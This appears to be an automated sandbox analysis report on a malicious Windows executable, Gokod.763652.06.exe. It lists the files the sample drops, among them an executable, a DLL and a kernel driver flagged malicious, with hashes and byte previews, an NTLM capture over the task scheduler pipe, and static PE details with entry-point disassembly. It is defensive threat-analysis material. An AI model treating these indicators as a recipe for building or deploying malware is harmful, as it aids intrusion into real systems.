///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\c[1].gif

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	10515
Entropy (8bit):	7.824657644789603
Encrypted:	false
SSDEEP:	192:PAotzSPrnRwz1kF69bButXBo+EROXPx3DWvuBQDRKe63WUxZjp3527L:P7tWPNw2FQbButSYxWvjRh63Wu35SL
MD5:	0035DC4371138478A84E3BAA8454C764
SHA1:	830A650F59A640386681E7D3ECD4F4D51756C4A2
SHA-256:	692721CF30588CF416B2E5C251D7070DC3C92E664EF47B7F3300187CF982EA8E
SHA-512:	7A63422BFFDDE835933146A85B03C20598A5A980394D7A7C32C7C92C7DBE81719A2057AC5A9419258CAAAA58D83C7E0DC34D989C387A19C9CFDB8D1A246991E7
Malicious:	false
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\J8daaU.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35146
Entropy (8bit):	7.986608104722799
Encrypted:	false
SSDEEP:	768:j4rkDlmmWL8EH2Ao3F932Lj/403oCBEkFtVYIAO3jk8AyWCbN3pD2nCg2lA:jTDFM8y2ART4etPVA8A9ovD4R2C
MD5:	F050E485170B3ED2DB0C8262CB090CD0
SHA1:	B11C5D85400EFD3464E850AC8E0A8BD280BA2798
SHA-256:	5F1E6D40ADD0C324C67C384D593CAB15223A5D2F468D063A5ED7C736170B0E3A
SHA-512:	48C1A3794D80A0E7E7F3BA0F0B43354505A102415F918EE90640649AFCBFE1691A3245703633147080F542B008DF29744621F544A38DEFD94E12E2A60FB228DB
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx..}.UU..... ...."..!.......!YFD.HHhD.F.DD&"......".....0...>..0.0..s...~g..;..s....0...;.....#.rg..Zg.....O...\|B..=.. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. .........w....WA..5.G.>+0...._;]9....TN...j.;.5.m)..x....Qw.:..."....@j.....s..Y1ujZ..v.n..H.uKv..1...e.x,..FoK...-wl.....3!.h....3..T.....".....`s...k...T..'...\|bnL.Y.V9x{..{f.......e.m...>..%.....@LQ. <e.._..X_Z......7.....s..=R....#..(....n...+\|U....mv...3[..7...Tj...y...1......p...Fl..$....cg..am....+{)...'{...t..d...I.h..w.c:..1._?P.R^..n....M>\<....T......e.......n.S..i.<.t........x..-.......9..n..$.....V<.9y.8W$a\|6>g...x....A7..6...~x_.Z..\.L...]......9...n..."...o...'.0...`5...+X...;.....&A.....^d.`.t..`tR.j..D9..9..:.\|..X........C(. ..sA...V.._3....q>[.~~p.{.........\..:b....n...i..g....'....A7.JP.#y...v..../..n...=U1.........../..n..@....:..3I.F&t...t.......AG.... ..^..y.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\drops[2].jpg

Download File

Process:	C:\Users\user\Documents\J8daaU.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35146
Entropy (8bit):	7.986608104722799
Encrypted:	false
SSDEEP:	768:j4rkDlmmWL8EH2Ao3F932Lj/403oCBEkFtVYIAO3jk8AyWCbN3pD2nCg2lA:jTDFM8y2ART4etPVA8A9ovD4R2C
MD5:	F050E485170B3ED2DB0C8262CB090CD0
SHA1:	B11C5D85400EFD3464E850AC8E0A8BD280BA2798
SHA-256:	5F1E6D40ADD0C324C67C384D593CAB15223A5D2F468D063A5ED7C736170B0E3A
SHA-512:	48C1A3794D80A0E7E7F3BA0F0B43354505A102415F918EE90640649AFCBFE1691A3245703633147080F542B008DF29744621F544A38DEFD94E12E2A60FB228DB
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx..}.UU..... ...."..!.......!YFD.HHhD.F.DD&"......".....0...>..0.0..s...~g..;..s....0...;.....#.rg..Zg.....O...\|B..=.. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. .........w....WA..5.G.>+0...._;]9....TN...j.;.5.m)..x....Qw.:..."....@j.....s..Y1ujZ..v.n..H.uKv..1...e.x,..FoK...-wl.....3!.h....3..T.....".....`s...k...T..'...\|bnL.Y.V9x{..{f.......e.m...>..%.....@LQ. <e.._..X_Z......7.....s..=R....#..(....n...+\|U....mv...3[..7...Tj...y...1......p...Fl..$....cg..am....+{)...'{...t..d...I.h..w.c:..1._?P.R^..n....M>\<....T......e.......n.S..i.<.t........x..-.......9..n..$.....V<.9y.8W$a\|6>g...x....A7..6...~x_.Z..\.L...]......9...n..."...o...'.0...`5...+X...;.....&A.....^d.`.t..`tR.j..D9..9..:.\|..X........C(. ..sA...V.._3....q>[.~~p.{.........\..:b....n...i..g....'....A7.JP.#y...v..../..n...=U1.........../..n..@....:..3I.F&t...t.......AG.... ..^..y.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\f[1].dat

Download File

Process:	C:\Users\user\Documents\J8daaU.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.688974052882154
Encrypted:	false
SSDEEP:	6:JRSJwHmHIJRIK4EgY+ZcRC62fmL874S9a6QT7LoV5yEha:fSJGmKIigY+ZcRufmA7VEVEI
MD5:	C345BADB7A3E3F956477B7945E4BE434
SHA1:	CE2EECFF4EAC735F38F82C6FB72A43D1B482839F
SHA-256:	B3CB5CF15F06434BB8F2C2FBDC1B86C8C057721198949928030E380AC6ED75BF
SHA-512:	5729CA585AE10421852D5C91095AA5528AD6DBB2598DAEC7972B86D557DC78D753DC103FB2C3613B9F29DDCED938B9A157CBCD101E0DA63A420B9C63285975CD
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111....1 zv.vvvvvvvYIIIvg%&A&&&&&&&NRRV%lyy..KLb#??.\Q.zs\|u.....ali....y$ie.J#g...4pj}}}}}}}}}}}}}}}}}}}}}}}}}}}}}....~7""LO..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxx..JMc">>.]P.{r}t..../`mh....x%hd.K"+f...7si~~~~~~~~~~~~~~~~~~~~~~~~~~~~~....}4!!OL..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&GGGG&&&&GGGG&&&&GGGG&&&i...iiiiiiiiiiiiiiiiiiiii19:9uv~.s{{.....................................~zvp.^..y.......................................jvks..].u......................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\i[1].dat

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.337586101070387
Encrypted:	false
SSDEEP:	6:WWczhuy0EZjCrCa2BIDROsZo4iXu607OdUzWFR960qOTGD:YwMBIDROsW4auVgUzWF7qHD
MD5:	EE43ABB08EB419A35FF870C5155DDB2E
SHA1:	4CD61078042E2DF18B31AF9F0CA28FBC856EC9F5
SHA-256:	8A0D8CF66B400E75FBDE60177084F88F1CDADDA77B213269938DEF97FE63179D
SHA-512:	2CA8FD8AF7027563F8A8D4404A7B23D0CCB3A6E47DB1625FB2B5DDEEEE628527BA30B7C77AC1E465E4FAA3F414770D2871B0C8C57208FC408F0C71DBEB561AA3
Malicious:	false
Preview:	....l%00HX.V0&x9JJ.Z4w8?VUVQ6.0=TDHS0 }0_].Q.68777777777777777777777777777777777_CCG4}hh..\.h~ a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33K[.U3%{:II.Y7t;<UVUR5\|3>WGKP3#~3\^.P~79666666666666666666666666666666666^BBF5\|ii..].i.!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111Te^Z?4t>RR>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>N[LX1v<:::::::::::::::::::::::::::::::::::::::::Y[YR7\|63G333333333333333333333333333333333333333

C:\Users\user\Documents\J8daaU.exe

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	138776
Entropy (8bit):	6.299362950486936
Encrypted:	false
SSDEEP:	3072:pIVf39AtRKuZkCi0UqcrkXuZ4Q4C0SgWQVUN9Lf9ct7mDRbPC:pIVGKuZ1vgrauUCjN5f9nlC
MD5:	DF76205EAF175184567FC44A83019B20
SHA1:	44F219ECFFF27BF81DCCEE076583D32CE5BF82BD
SHA-256:	A6123E13E12A1A1D4C4A4EB034769BFE8E229C3A9877E0DD173B422E700A26AC
SHA-512:	0C50564629B28D32E5EC74C4B76FBD2C79376838FF6B60DB92403E164BF7CDEECC7FD2A922C64356322C5150792CCD657EED0CB6D974E82682EFF5B6BB640E6A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w................................................S...............=...S......S...........S......Rich............................PE..d......f..........".................t-.........@.............................0............`..............................................................................L... ..d.......p...............................8...............X............................text...0........................... ..`.rdata..............................@..@.data...8...........................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..d.... ......................@..B................................................................................................................................................................................

C:\Users\user\Documents\cache.dat

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3961669
Entropy (8bit):	7.999921049520985
Encrypted:	true
SSDEEP:	98304:wLfESZqX9Gx2pXp60/aZqHIu0nnHmrHHg:wLfLZqX4x2pXM0IAIu4HmrHA
MD5:	9C91C37AC4B0188DEAC34D680091A81B
SHA1:	3C82F7917187638EC5D4B2565CD65AFBA14BD4C2
SHA-256:	6B75C562EDB832E3BB1A5C4C4847ED3C560A7A3BEF1EB652D27A70A0C033B62A
SHA-512:	1FACD74C850B26993AEC26EE074D3E8735386A3994BF9D761E84E9AFD2DD9F04A38466B8FA958124BD9841ABFD729C4FE87FA458641FF20D8FC773F555DD59FD
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx..}.UU..... ...."..!.......!YFD.HHhD.F.DD&"......".....0...>..0.0..s...~g..;..s....0...;.....#.rg..Zg.....O...\|B..=.. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. .........w....WA..5.G.>+....._;]9....TN...j.;.5.m)..x....Qw.:..."....@j.....s..Y1ujZ..v.n..H.uKv..1...e.x,..FoK...-wl.....3!.h....3..T.....".....`s...k...T..'...\|bnL.Y.V9x{..{f.......e.m...>..%.....@LQ. <e.._..X_Z......7.....s..=R....#..(....n...+\|U....mv...3[..7...Tj...y...1......p...Fl..$....cg..am....+{)...'{...t..d...I.h..w.c:..1._?P.R^..n....M>\<....T......e.......n.S..i.<.t........x..-.......9..n..$.....V<.9y.8W$a\|6>g...x....A7..6...~x_.Z..\.L...]......9...n..."...o...'.0...`5...+X...;.....&A.....^d.`.t..`tR.j..D9..9..:.\|..X........C(. ..sA...V.._3....q>[.~~p.{.........\..:b....n...i..g....'....A7.JP.#y...v..../..n...=U1.........../..n..@....:..3I.F&t...t.......AG.... ..^..y.

C:\Users\user\Documents\eToken.dll

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3677216
Entropy (8bit):	7.965644371578814
Encrypted:	false
SSDEEP:	98304:IPoIOw5/XsBczXPm7iTUlNw2kGiVDFnkyej4MWD:woe/cBcmlNLkGOFzekf
MD5:	348927A4F5D1E0D01EF02FC91D3F1885
SHA1:	4FCE3128E844ACCC33AC042FAFA7303D5C85CE8E
SHA-256:	44EAE353E7AF24CE43E7308F0B56ED2839E049B874C7272A4E8A70A3255C6625
SHA-512:	5BAC3F0E3DC346481101C84BE73CED832D1E706828D871CCB4C720C29D2D225502911A2D8E4B916C84C24A182A214EF3E65EEB295DAA9E149FEE6B264FEA85D2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....g.........." ...)............J.L.......................................Z...........`.........................................@.N.L.....H.P.....Z.a.....Y..;............Y.4...................................@.Y.@.............!.X............................text...@........................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.QO ....H........................... ..`.h1c....h.....!.....................@....{,3......7...!...7.................`..h.reloc..4.....Y.......8.............@..@.rsrc...a.....Z.......8.............@..@........................................................................................................................................................................................................................................................

C:\Users\user\Documents\perfi.db

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	SQLite 3.x database, user version 1, last written using SQLite version 3043002, writer version 2, read version 2, file counter 33, database pages 224, 1st free page 36, free pages 219, cookie 0x4, schema 4, UTF-16 little endian, version-valid-for 33
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	7.9657321435710875
Encrypted:	false
SSDEEP:	192:NB+jaaYI8zd2LSUtOd+s/e+8opeEWonaK3EIOJjBF+J:NB++9aQdgoIIa5IOR8
MD5:	BA8B5CE9F36A17BF2325AF18AFEA5177
SHA1:	9F237C5D9FB6B2EB20226EB6C4B4C707A55F9024
SHA-256:	A35B356F4A0A0717B57FF8665EBDD5B0A0F4F67096A4342E645AAEFB2D5C4B71
SHA-512:	41C5D86AE8CD2118B9EBD6A69DAEB34BCD5B8D1B4BDE41D8643C7891E2B58052B39D5356B362FD9FE9D9B28C2414F6CCE43B1DBE677A20E8708D825788ED18D0
Malicious:	false
Preview:	SQLite format 3......@ ...!.......$...........................................................!..n.......N..}...7.N...=.!so'.g..}_.S>Q..{.N.c....;G_fx5.#DO..g..}A....l=.2......'o...!.....e.&...o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|m....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1.."...`.,...~....)w.5E 1.V...0DA..~d..........<....> {......I...()G...9.#.h.7...=......!...s..X2.].+.c.o\|.L.U....p...8M+k.......g.....Z..-<..w..tHW...W......l.....wU........p.Z.N..%..v.....h(...Y....Z....0t${.s....s..k.l/.U.U.`D....S5x.V'{..7.+.0[.V..;#.lyt'RI.....\|f..Y.M1.r.w..v.............E......]<X....M..q.....t..F.i5...`...Y^..O6....A2.R.3!b...`...G`.81.M^T.{......o.S.... ...q..e..6..z.......-...F....:.&.......@.1....bI8..o.b.Cr..A...../..\.,,z@.....UX..9....T..,.f.bL...S........T........g.....

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	7388
Entropy (8bit):	3.2406172262721733
Encrypted:	false
SSDEEP:	96:cEi+AAsoJjykzEJ+AAsoJjykHEW+AAsoJjykA:cN+SoJbO+SoJvx+SoJI
MD5:	A8CA831C38C32E986F27F7D6C3EF1E02
SHA1:	CA17C0949E577EE8E9E7E9C776DAB705DD2D0FC1
SHA-256:	918701D1D00F2B8DB94ADD3158130733B2EFFD03B6A7B66071FFD82536C5245A
SHA-512:	6645AC6A151D4F7E128D3E6F60B51EE218D6A3D3FF9F1C9E20ACD72F3363111E7DCA457FDB66E1D7E62A897F4BC0AE6F5F968C5E9CF620E6F5F901AE4DE5A236
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. O.c.t. .. 0.4. .. 2.0.2.3. .1.2.:.0.3.:.4.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e........................................ .W.S.C. .S.t.a.t.e. .I.n.f.o. ................................................................. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. ..............................d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

C:\Windows\Temp\aceprocted.sys

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.229088857176949
Encrypted:	false
SSDEEP:	384:i3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/P:iOUkgfdZ9pRyv+uPzCMHo3q4tDghJ
MD5:	1BAA10773FE51429FF108182487CE4C5
SHA1:	EDBDA060EC6CCAACCA11D3499DEFCEBA18979182
SHA-256:	81195C0E16B888E602DCF2A74EFEBA62115DB8275A04BFA5F5DFB21A5147EA1F
SHA-512:	765135A0184489C5F47200BEC461F3AE54CFDBC08A18083CDE44FE27CD9E1F5033103CF275E6D87A4340D352528237B06CC16117F6C7A93B48C47174B79ADA70
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4691011796201305
Encrypted:	false
SSDEEP:	6144:cIXfpi67eLPU9skLmb0b44WSPKaJG8nAgejZMMhA2gX4WABlVuNbdwBCswSb8:hXD944WlLZMM6YFUN+8
MD5:	B7DE87CCB8B19DBD17FC3E79592E0B1D
SHA1:	A6F2DDEC8C50165DC13EF5DFC2510951F2C53939
SHA-256:	36916E5735969B46E707D9078BFDF43EC0E8FEE87B5CEF58E344ADFB35BE9EA5
SHA-512:	1D0121E7EDBCA9ED8AB38B20F0AF8BF245A41FAABA5DCBA5373B1B48AC12CFD9B71817A1E05D5787F0B3A11359018E5A3F6B94E12A0F5AB36846D1ED0C2615C8
Malicious:	false
Preview:	regf:...:....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^...*................................................................................................................................................................................................................................................................................................................................................[..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	384373
Entropy (8bit):	7.9934459559654
Encrypted:	true
SSDEEP:	6144:EsUs8N+ar/YfpdrC/cn0Erevq1VCyeeSABLmO9R0eyuDqTQC+Es+pz6yDHNi:mZN+amesrevq1VheeSyHbRDqT7+ESgY
MD5:	73662909258B04A4256B2EEDE6DFB58C
SHA1:	3E90E6BDC2D3CC010F0FF6D7C9459256CFD64BB0
SHA-256:	B1645835FE76263A62F1552E563465AFF39A6BB998C10041E48E9183593CFCE9
SHA-512:	2FE911EACBD484061F148F73A1C708A4E447493816F4F76C76CED47DB0063D2CF2DF13259F30E94959D7CE7B318FC80EDDE5355A1EBBA5084A8AFD285400D61C
Malicious:	false
Preview:	..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......3.qq..7I......6........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ.....{..k...{8.l7..u................\|.......IY..D@.$.621......B'....n..@..0pR.......,............)...E.[.?..hw..s.c(.E.....E.h...V.I.I..2......1U!kQ...,...vh..=6.Q..v...^.E...04.i....F.w...+:.2.9.e.r.d._./.....H...U.-Fc...;.=./....}..h.C.{~..).y.U.T.fi.]!..../4.......9.zOa:r.^f....K....!.b....j...\.....U;.m.....~P.4X...\.IE.u../knBj..E"+f.".P...1..W.".W....`..m....%.....Xq..c...` ..D.L./#.`..%.e...<\|.k)..eN.r.[...TX\^.[;....._e....8Qd]....l..z..'.._.U!T.....s.2B@..u0.b.\|....(i....[/.wR..).9y(.&.~.rR...,..v....l.'...@0.._..w%:....EUrp.i{.g..d....yJ.o..e..G.bd...\|%...+.."...Z........`..._..."5Pw......'.....D+/.....g./$..n..I........j

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.509074671428478
TrID:	Win64 Executable GUI (202006/5) 60.38% Windows ActiveX control (116523/4) 34.83% Win64 Executable (generic) (12005/4) 3.59% Generic Win/DOS Executable (2004/3) 0.60% DOS Executable Generic (2002/1) 0.60%
File name:	Gokod.763652.06.exe
File size:	31'995'126 bytes
MD5:	815b9e41304ca2db2a1f89fbd68639a5
SHA1:	211508e3fccb4df2cdb01dc9d8b3dd743dfac826
SHA256:	bd2587248361ab3a0f069890945917ecb0b4775985c82fe18629c97d86096706
SHA512:	9d4193a37eabad71c0b7d3481431af24bdf07ff81f097497a7b386c3d68853bf188be19cde88a49368501cdd3d1c597e10872b0d55cb3e2a8eed92ece4b40ab1
SSDEEP:	393216:ulou3k+no3MhUd+87dFH6HQdmpQrLIOchCbcanW6BxBSKXcfbvaC0wfCi0D6UJ:zIdZ2lHDdmpQHI5c4aXBS5mwfh0
TLSH:	1467E052BBA98565C115C2300CD34F129775BD418F2649CB71DC3B2EBFB7AD02E6E28A
File Content Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:L..["..["..[".!....[".!....[".!....["...!..["...&..["...&..["...'..[".p.'..["...'..[".H....[".H....["..[#..Z"...+..["......["

File Icon


Icon Hash:	497971328ce1634d

Static PE Info

General

Entrypoint:	0x1400190ac
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
Time Stamp:	0x5BA3858A [Thu Sep 20 11:33:30 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	59af4ace1b4e61d7241b669b53bd0dc0

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F6FE4EB9D2Ch
dec eax
add esp, 28h
jmp 00007F6FE4EA162Dh
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F6FE4EB95A2h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F6FE4EB95A5h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
add ecx, dword ptr [ebx+08h]
test byte ptr [ecx+03h], 0000000Fh
je 00007F6FE4EB959Ch
movzx eax, byte ptr [ecx+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F6FE4EB8ACCh
int3
int3
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ecx
mov ebx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007F6FE4EB9501h

Rich Headers

Programming Language:

[ C ] VS2015 UPD3.1 build 24215
[C++] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d1c0	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x54000	0x4328	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x4f000	0x279c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x52c00	0x21c8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x59000	0x828	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x36570	0x70	.rdata
